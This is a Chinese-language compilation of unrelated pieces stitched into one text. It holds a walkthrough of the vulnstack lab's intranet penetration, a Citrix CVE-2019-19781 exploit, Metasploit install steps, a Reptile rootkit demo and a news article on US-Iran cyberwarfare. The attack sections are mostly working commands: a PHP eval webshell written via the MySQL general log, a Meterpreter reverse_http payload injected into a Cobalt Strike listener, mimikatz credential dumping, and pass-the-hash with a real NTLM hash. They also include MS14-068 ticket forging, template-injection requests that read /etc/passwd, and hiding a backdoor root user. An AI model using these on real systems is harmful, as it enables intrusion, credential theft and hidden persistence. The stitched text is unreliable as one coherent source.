地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

主要以该环境讲解内网渗透的技术。

拓扑图如下:

1.png

Web服务器(Windows7):

192.168.10.14 、192.168.52.143

主机名:stu1

域成员主机(Windows Server 2003):192.168.52.141

主机名:root-tvi862ubeh

域控(Windows Server 2008):

192.168.52.138

主机名:owa

其中,Web服务器的192.168.10.14模拟公网地址,我们可以直接访问192.168.10.14。但是我们访问不了192.168.52.0网段。

0x01 拿下Web服务器

本文主要是讲内网渗透方面,所以关于怎么拿下Web服务器,比较粗略的过。
说下我们对Web服务器的思路吧。在红蓝对抗中,拿到了入口站点,我们首先会想办法获取入口点的shell,再以此挂隧道通内网。而拿shell无非是上传木马、SQL注入、反序列化。而在很多网站的登录后台后,会存在文件上传漏洞,进而getshell。

访问Web服务器地址:http://192.168.10.14/yxcms/

它是一个yxcms的站点

2.png

对于yxcms我也不熟悉,之前没接触过。拿到目标第一先用御剑扫描下后台吧

3.png

4.png

发现phpmyadmin后台登录地址:http://192.168.10.14/phpmyadmin/

发现一个压缩包文件,该文件是网站的压缩包文件:http://192.168.10.14/beifen.rar

发现phpinfo文件:http://192.168.10.14/phpinfo.php

发现一些比较敏感的目录,这些目录都存在目录遍历漏洞

http://192.168.10.14/yxcms/robots.txt
http://192.168.10.14/yxcms/data/
http://192.168.10.14/yxcms/public/
http://192.168.10.14/yxcms/upload/
http://192.168.10.14/yxcms/protected/

5.png

phpmyadmin后台getshell

对phpmyadmin后台进行爆破,得到账号密码:root/root

6.png

进入phpmyadmin后台后,获取shell。传送门:phpmyadmin爆破和后台getshell

这里由于 secure_file_priv的值为NULL,所以我们不能利用写into outfile写木马getshell。

7.png

这里我们利用日志文件Getshell。传送门:phpmyadmin利用日志文件Getshell

执行以下命令

set global general_log=on;                                     #开启日志
set global general_log_file='C:/phpstudy/www/yxcms/hack.php';  #设置指定文件为网站日志存放文件
SELECT '<?php eval($_POST["cmd"]);?>' 

最后用菜刀连接,如下。

8.png

0x02 后渗透第一步

在拿到了Web服务器的权限后,我们就要尽可能多的搜集该服务器的信息,然后搭建隧道通往内网!

执行以下命令我们知道当前的用户身份是 administrator ,在管理员组中,并且处在域 god 中。该主机有两张网卡

分别是:192.168.10.14,192.168.52.143。

由此可知,其实获得的这个权限就是域管理员权限。(搞不懂环境为啥要以域管理员账号登录,为啥不以本地普通用户登录??)

9.png

10.png

现在我们想反弹一个MSF的shell。将MSF生成的木马上传到该主机上,执行,反弹成功!

11.png

派生CobaltStrike权限

首先在CobaltStrike上开启一个监听

12.png

然后在MSF中执行以下操作,我们的CobaltStrike就接收到反弹过来的shell了。

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true   #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true
set lhost xxxx                 #cobaltstrike监听的ip
set lport 14444                 #cobaltstrike监听的端口 
set session 1                   #这里是获得的session的id
exploit

13.png

获得System权限

这里由于获得的直接是adminsitrator权限,所以可以直接提到system。在真实环境中,这里很多时候都是一个普通用户权限,需要我们去提权。

14.png

获取账号密码

1:导出hash

run hashdump

15.png

2:导出hash

run windows/gather/smart_hashdump

16.png

3:加载 kiwi模块

这里尝试加载kiwi模块,获取不到账号密码

load kiwi
creds_all

17.png

4:加载 mimikatz 模块

再尝试加载 mimikatz 模块,加载模块前需要先将meterpreter迁移到64位的进程,而且该进程也需要是system权限运行的。

如图,成功获得账号密码:administrator/[email protected]

migrate PID
load mimikatz
mimikatz_command -f sekurlsa::searchPasswords

18.png

远程桌面登录

这里我们已经获得了administrator的账号和密码,现在我们既可以使用administrator账号登录,也可以新建账号登录(hack/[email protected])。(不建议直接用administrator身份登录,因为这样有可能会惊动管理员)

19.png

通过nmap扫描发现该主机的3389端口呈过滤状态,由此猜想可能是防火墙将该端口过滤了

20.png

于是执行以下命令开启3389端口

run post/windows/manage/enable_rdp

21.png

再次探测发现3389端口已是open状态

22.png

尝试3389远程登录该主机,但是弹出如果我们继续登录,则会断开该主机的当前连接。为了不惊动管理员,这里我们不继续连接了。

23.png

添加路由、挂Socks4a代理

添加路由的目的是为了让我们的MSF其他模块能访问内网的其他主机

添加socks4a代理的目的是为了让其他软件更方便的访问到内网的其他主机的服务

注:添加路由一定要在挂代理之前,因为代理需要用到路由功能

#添加路由
route add 0.0.0.0 0.0.0.0 1
run print

#添加socks4a代理
use auxiliary/server/socks4a
run
#然后打开/etc/proxychains.conf,加入下面一行
socks4 0.0.0.0 1080

#然后就可以使用nmap了
proxychains nmap -p 21 -Pn -sT x.x.x.x     #在打开其他程序前加上proxychains

24.png

25.png

我们也可以在本机设置socks4代理,指向我们vps的1080端口。那么,我们本地的流量就会交给VPS的1080端口,而1080端口是MSF起的,MSF又添加了到内网的路由,自然我们就可以访问到内网的主机。

26.png

这里我实测用MSF挂的socks4a代理并不稳定,建议实战环境用 FRP 起的 socks5 代理,这里我为了省事直接用MSF的socks代理。其实新版的MSF也有了socks5代理,不过好像也不是很好用。

域信息收集

net time /domain        #查看时间服务器
net user /domain        #查看域用户
net view /domain        #查看有几个域
net group "domain computers" /domain         #查看域内所有的主机名
net group "domain admins"   /domain          #查看域管理员
net group "domain controllers" /domain       #查看域控

从域信息收集可以得到以下信息:

域:god.org
域内有三个用户:administrator、ligang、liukaifeng01
域内有三台主机:
DEV1(不在此环境中)
ROOT-TVI862UBEH(192.168.52.141)
STU1(192.168.52.143)
域控:OWA(192.168.52.138)
域管理员:administrator

由此可见,我们现在获得的即是域管理员权限。此环境内还有一台ROOT-TVI862UBEH(192.168.52.141)和域控OWA(192.168.52.138)。

27.png

28.png

0x03 内网主机信息收集

我们现在想进行内网横向渗透,就需要收集更多的信息,内网渗透信息收集是非常重要的一步。

由于我们之前添加了路由信息并且挂了Socks4a代理,所以我们现在可以使用MSF里面的探测模块以及nmap对内网进行探测。

内网存活主机探测

这一步在域环境渗透中可以省略,因为使用域命令可以直接查询域中有哪些主机。在非域环境中渗透,可以使用这一步。

在这里顺带提一下这个用法。更多的关于使用MSF进行内网探测,传送门:后渗透阶段之基于MSF的内网主机探测

auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机

29.png

30.png

31.png

内网存活主机端口扫描

1:使用MSF自带模块进行端口探测

auxiliary/scanner/portscan/tcp   #基于tcp进行端口扫描(默认扫描1-10000)

32.png

2:使用 proxychains 代理链利用 nmap 对内网主机进行端口探测

33.png

内网存活主机服务探测

auxiliary/scanner/ftp/ftp_version            #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version            #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version      #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp                #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version          #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title                 #探测内网http服务的标题
auxiliary/scanner/smb/smb_version            #发现内网smb服务,基于默认的445端口   
auxiliary/scanner/mssql/mssql_schemadump     #发现内网SQLServer服务,基于默认的1433端口
auxiliary/scanner/oracle/oracle_hashdump     #发现内网oracle服务,基于默认的1521端口 
auxiliary/scanner/mysql/mysql_version        #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner            #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server         #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version            #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname             #探测内网主机的netbios名字

34.png

经过了以上几步,我们就可以大致判断内网存活的主机、主机开放的端口以及服务这些基本信息了。

0x04 内网横向渗透攻击技巧

在对内网主机进行信息收集后,接下来我们就是要对内网主机发动攻击了。内网攻击方法有下面这些。

MS17-010

永恒之蓝在内网渗透中是屡试不爽的,基本上一打一大片。但是MS17-010在实际红蓝对抗渗透中(通过代理打内网)并不好利用,MSF中自带的模块要打很多次才能成功一次,而且MSF自带的模块打sever2003的机器很容器蓝屏。注意这里的payload必须设置为正向连接 bind_tcp。

如下,第一次打就没打成功。

35.png

36.png

CVE-2019-0708

该漏洞是今年爆出的一个windows RDP协议的漏洞,但是测了一下,发现该主机不存在该漏洞。另外,该漏洞成功率也不高,而且极有可能把目标机打成蓝屏的结果。所以在真实红蓝对抗中不建议使用该漏洞,除非有百分百的把握能打成功.

37.png

38.png

psexec攻击

我们已经获得了域管理员 god/administrator 的账号密码,我们现在可以使用该域管理员账号密码利用 psexec 登录域内任何一台开启了admin$共享(该共享默认开启) 的主机。

注:由于提示需要修改密码,所以已将 god/administrator 的密码改为 [email protected]

psexec.exe \\192.168.52.138 -u god\administrator -p [email protected] cmd

39.png

但是在连接 Server2003服务器 的时候出了点小问题,提示服务没有及时响应启动或控制请求。

40.png

哈希传递攻击

在域环境内,只有获得了域管理员的哈希才可以攻击。这里假设我们得到了域管理员administrator的哈希,但是没有得到明文密码。在这里我们就可以用哈希传递攻击了。

在前面获得了域管理员 administrator 的NTLM哈希为:c456c606a647ef44b646c44a227917a4

sekurlsa::pth /user:administrator /domain:"god.org" /ntlm:c456c606a647ef44b646c44a227917a4

41.png

MS14-068

MS14-068漏洞适用于当我们获得了普通域用户的哈希,域控存在MS14-068漏洞的场景。我们现在想利用获得了普通域用户哈希去访问域控。
但是这里我们是直接获得了域管理员的哈希,这里只是演示下MS14-068漏洞的攻击手法

先获取需要利用的域用户的SID值

42.png

#生成票据[email protected]
MS14-068.exe -u [email protected] -p [email protected] -s S-1-5-21-2952760202-1353902439-2381784089-500 -d 192.168.52.138      #MS14-068.exe -u 域用户 @dog.org -p 域用户密码 -s 域用户的SID -d 域控ip

#在mimikatz中导入票据
kerberos::ptc  [email protected]的路径

然后再打开一个cmd窗口尝试访问域控
dir \\192.168.52.138\c$

43.png

0x01 下载文件 NSVPX-ESX-13.0-47.22_nc_64.zip

https://www.citrix.com/downloads/citrix-gateway/

1.png

配置静态ip

2.png

3.png

0x02 nmap 扫描

Scanning 192.168.3.244 [65535 ports]
Discovered open port 80/tcp on 192.168.3.244
Discovered open port 22/tcp on 192.168.3.244
Discovered open port 443/tcp on 192.168.3.244

4.png

没有安装证书

http://192.168.3.244/

default password: nsroot/nsroot

5.png

0x03 上传 xml

6.png

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 192.168.3.244
User-Agent: 1
Connection: close
NSC_USER: ../../../netscaler/portal/templates/jas502n
NSC_NONCE: nsroot
Content-Length: 97

url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 06:36:44 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 11 Jan 2020 06:36:44 GMT
ETag: W/"87-59bdd52283e00"
Accept-Ranges: bytes
Content-Length: 135
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<HTML>
<BODY>
<SCRIPT language=javascript type=text/javascript>
//parent.window.ns_reload();
window.close();
</SCRIPT>
</BODY>
</HTML>

0x04 执行命令

7.png

GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1
Host: 192.168.3.244
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
NSC_USER: nsroot
NSC_NONCE: nsroot
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 06:37:40 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-control: no-cache
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Expires: Sat, 11 Jan 2020 06:37:40 GMT
Content-Length: 2255

# $FreeBSD: release/8.4.0/etc/master.passwd 243948 2012-12-06 11:54:25Z rwatson $
#
root:*:0:0:Charlie &:/root:/usr/bin/bash
nsroot:*:0:0:Netscaler Root:/root:/netscaler/nssh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
nsmonitor:*:65532:65534:Netscaler Monitoring user:/var/nstmp/monitors:/usr/sbin/nologin

undef error - Attempt to bless into a reference at /usr/local/lib/perl5/site_perl/5.14.2/mach/Template/Document.pm line 92.

参考链接

https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/

Linux / Mac OS X

Installing Metasploit on Linux / Mac OS X

The following script invocation will import the Rapid7 signing key and setup the package for supported Linux and OS X systems:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall

These packages integrate into your package manager and can be updated with msfupdate or with your package manager. On first start, these packages will automatically setup the database or use your existing database.

Windows

Installing Metasploit on Windows

Download the latest Windows installer or view older builds. To install, simply download the .msi package, adjust your Antivirus as-needed to ignore c:metasploit-framework, double-click and enjoy. The msfconsole command and all related tools will be added to the system %PATH% environment variable.

Windows Anti-virus software flags the contents of these packages!

If you downloaded Metasploit from us, there is no cause for alarm. We pride ourselves on offering the ability for our customers and followers to have the same toolset that the hackers have so that they can test systems more accurately. Because these (and the other exploits and tools in Metasploit) are identical or very similar to existing malicious toolsets, they can be used for nefarious purposes, and they are often flagged and automatically removed by antivirus programs, just like the malware they mimic.

Improving these installers

Feel free to review and help improve the source code for our installers.

Other Versions:

https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version

一:什么是rootkit病毒木马?

Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。

以上文字引自百度百科。

二:安装

本次玩的木马名为Reptile 。github地址:

https://github.com/f0rb1dd3n/Reptile/

假设黑客通过漏洞已拿到服务器root权限,他就可以在服务器上安装rootkit木马后门,来躲避运维同事的检查。长期驻留在服务器去做一些羞羞的事情。

测试环境(自己的腾讯云主机):centos7.2

1.png

安装rootkit:

2.png

安装完rootkit后门后,后门文件是隐藏的,木马后门文件是

/reptile/reptile_cmd

用 ls -alh 命令是看不到后门文件的:

3.png

但是木马文件是存在的:

4.png

三:做一些羞羞的事情

查看服务器正常用户:

5.png

安装完rootkit后,任何文件,只要添加上#<reptile> #</reptile>这个标签,标签里的内容就会被隐藏起来。

#<reptile> 
要影藏的内容
#</reptile>

那好办了,先添加用户

6.png

把用户改为root权限后用新添加的用户连接服务器:

7.png

编辑/etc/passwd文件,添加隐藏标签:

8.png

再次查看/etc/passwd文件,已无法看到"忘了爱"用户:

9.png

该rootkit病毒木马不仅可以隐藏文件内容,还可以隐藏网络连接信息,隐藏指定的进程,让服务器管理员看不到黑客的网络连接信息。

查看网络连接,并隐藏某一条tcp网络连接信息:

10.png

进程隐藏:

11.png

该rootkit木马后门的强大功能不仅仅是这些,还可以隐藏文件,反弹后门shell等等,听说有端口复用功能,这个还没做过,以后不忙的时候可以玩玩。

黑客们绞尽乳汁的入侵一个服务器,拿到权限后都不想很快被管理员发现,所以他们会利用各种猥琐手段来留下后门,以便以后随时可以再进入到服务器。

自美军在伊拉克“斩首”伊朗将领苏莱曼尼以来,美伊双方急剧升温。两国网络战争大有一触即发之势。

前天黑客攻击的目标是美国联邦存托图书馆项目 ,黑客称这是对1月3日美军无人机袭击苏莱曼尼的报复。黑客们在网站上首页写道:“这是来自伊朗伊斯兰共和国的信息,我们不会停止支持在这些地区的朋友,包括在巴勒斯坦、也门、巴林被压迫的人民,在叙利亚和伊拉克的人民及其政府,以及在黎巴嫩和巴勒斯坦真正的圣战抵抗组织。”黑客补充说,“这只是伊朗网络(袭击)能力的一小部分。我们随时准备着。等着吧。”

除了上面针对美国政府网站攻击的行为之外,还有一个名为SHIELD IRAN的黑客团伙开始随机攻击任意网站,并挂上具有少将头像的黑页。分析发现,该黑客团伙在几年前已经非常活跃了,从人员分布来看,规模不小。

1.png

而且根据全球流量监测,近两天,全球范围的扫描、弱口令、漏洞攻击几倍暴增。

2.png

网络战这个词儿终于不再是一个概念了,而实际上美国和伊朗尽管在现实没有交火,在网络世界里却早已处于“战争状态”。

伊朗网络战部队威名赫赫

2010年年底,观察家们注意到伊朗悄悄成立了一支名为“网络防御司令部”的组织,他们高度怀疑这个组织是伊朗网军的马甲,实际上受伊朗武装部队联合参谋部的指挥。此后曝光的一系列信息显示,伊朗这支网军具备相当强悍的战斗力,2012年美国各大银行系统和沙特阿美石油公司网络遭到大规模攻击,沙特阿美公司办公网数据遭到大规模篡改和清空,渣打、摩根大通等多家银行网银系统崩溃;2014年,以色列互联网遭到多频次大规模网络攻击;2015年,土耳其电力系统在网络攻击下崩溃,包括首都安卡拉和最大城市伊斯坦布尔在内的全国44个地区大规模停电12小时,而这些活动的始作俑者都指向伊朗网络作战部队,这也是为什么伊朗革命卫队穆罕默德.侯赛因.塞佩尔准将声称伊朗拥有世界第四大网军的原因。

3.png

网络攻击迫使布希尔核电站推迟投产

不过说起伊朗网军如此强大的推动力,恐怕还是要找他的老冤家美国。2010年10月,伊朗政府以“内部泄漏事故”为由,宣布其首座核电站——布希尔核电站的正式投产时间由当年11月推迟到2011年,此后即传出消息称伊朗几个核燃料工厂内的离心机突然大规模发生故障,损失巨大,使得布希尔核电站的燃料供应面对巨大挑战,这才不得不推迟投产时间。

4.png

当时人们多以为是伊朗技术不过关的原因,直到2011年才传出消息称伊朗核燃料工厂遭遇特定网络病毒的攻击,该病毒针对西门子公司生产的可编程序逻辑控制器进行攻击从而破坏了伊朗大量离心机,伊朗随后也承认了这一消息,这个病毒就是由美国研发、以色列测试的震网病毒,也正是这样的损失迫使伊朗建立了自己的专业网络战部队,美国和以色列也承认伊朗网军是素质最优秀的网络战部队之一。

美军网络战部队实力强劲

实际上美国很早就建立了自己的网络战部队,并且开发了一系列网路战工具,可以说是这一领域的始作俑者。美国2009年5月即成立了自己的网络战部队,6月组建网络战司令部,10月全面开始运行,他们利用“棱镜”、“溯流”等计划大规模窃取流经互联网主根服务器的数据;利用“量子”等项目开发震网病毒和一系列离线攻击工具,此外还有“舒特”、“野蜂”等一系列窃密、加密装备,可以说美国在这一领域占据着绝对优势,这也是为什么他们能在年初轻易攻击和封锁俄罗斯网络情报中心的原因,更别说在网络上同伊朗打的有来有往,迫使伊朗、俄罗斯不得不启动互联网隔离计划,实际上在网络这个看不见的战场上,美国早已咄咄逼人,同战争开启没有什么两样了。

美伊间的网络攻击

正是因为网络袭击较为隐蔽,代价也相对较低的特点,美国、以色列、伊朗和沙特在近十年中一直在通过黑客暗中较量。

2019年1月,美国情报机构在其发布的《全球威胁评估报告》认为,伊朗的网络间谍和攻击威胁能够攻击美国官员、窃取情报,能够让大型企业的网络瘫痪数日、甚至数周。

2019年4月,有黑客发布了据称属于伊朗国家背景的APT攻击组织APT34(oilrig、HelixKitten)的网络武器库,显示具有较强的攻击能力。安全公司趋势科技在2019年也发布了黑客组织APT33的相关信息:该机构以针对能源部门发动破坏性攻击的Shamoon恶意软件著称,主要攻击针对美国和中东地区的石油天然气行业,据信也是听命于德黑兰的黑客组织。

安全专家认为,伊朗网络攻击组织一直致力于寻求攻击基础设施、工厂和油气机构,一场伊朗政府机构支持的网络攻击报复将可能导致电力中断和城市瘫痪。比如,2012年伊朗相关黑客就曾试图攻击纽约市郊的水坝系统。

有安全机构分析,伊朗未必会发起大规模的网络攻击行动,这是担心行动升级将会导致自身被攻击。“如果把美国逼得太狠,造成的影响可能难以控制。”因为美伊之间相互的网络攻击从未真正停止过。

2019年10月,微软威胁情报中心披露,伊朗政府相关黑客组织发起名为Phosphorus 的攻击,试图入侵美国总统大选活动、政府官员和媒体记者的邮件账户。
2019年6月,美国攻击了伊朗的导弹发射系统,消弱了其攻击海湾商船的能力。
2016年美国司法机构指控7名与伊朗政府有关的黑客,在2013年实施了针对美国银行、纳斯达克和纽交所等金融机构和纽约一小型水坝发起大规模协调攻击,以报复美国的经济制裁。
2014年,伊朗黑客组织攻击了拉斯维加斯金沙公司,因为公司老板是以色列的重要支持者。
2012,伊朗黑客利用 Shamoon恶意程序,攻击沙特阿美石油公司,清除了3万台电脑的数据。
2009-2010年,美国和以色列利用震网病毒破坏伊朗铀浓缩离心机,延迟伊朗核计划。

网络攻击武器是现代战争“利剑”

美国国土安全部高级网络安全官员克里斯托弗·克雷布斯警告美国公司和政府机构,在袭击发生后,要“密切关注”关键系统,以及伊朗的工具、战术和程序。“在每一场现代冲突中,网络都会扮演一个角色。”塞尔吉奥•卡尔塔吉隆(Sergio Caltagirone)说,他是前美国国家安全局技术主管,现就职于工业网络安全公司 Dragos ,“无论这是一个隐藏的角色还是一个公开的角色,网络都将有一席之地,特别是在对两国同样重要的行动中。”

5.png

Dragos 已向其在美国和中东地区有业务的工业客户发出警告,称破坏性网络攻击的风险正在增加。考虑到沙特阿拉伯和科威特长期以来一直是伊朗网络攻击的目标,这两个国家被认为是最有可能率先被波及的。

目前看来,网络袭击确实是伊朗对苏莱曼尼被杀所采取的首个报复手段,但绝不是回应的唯一方式。

有趣的是,伊朗的网络袭击为网络安全公司带来了利好消息。彭博新闻社报道称,在地区局势紧张导致大盘普遍下跌的情况下,多家网络安全公司的股票在当地时间4日分别上涨2~4%。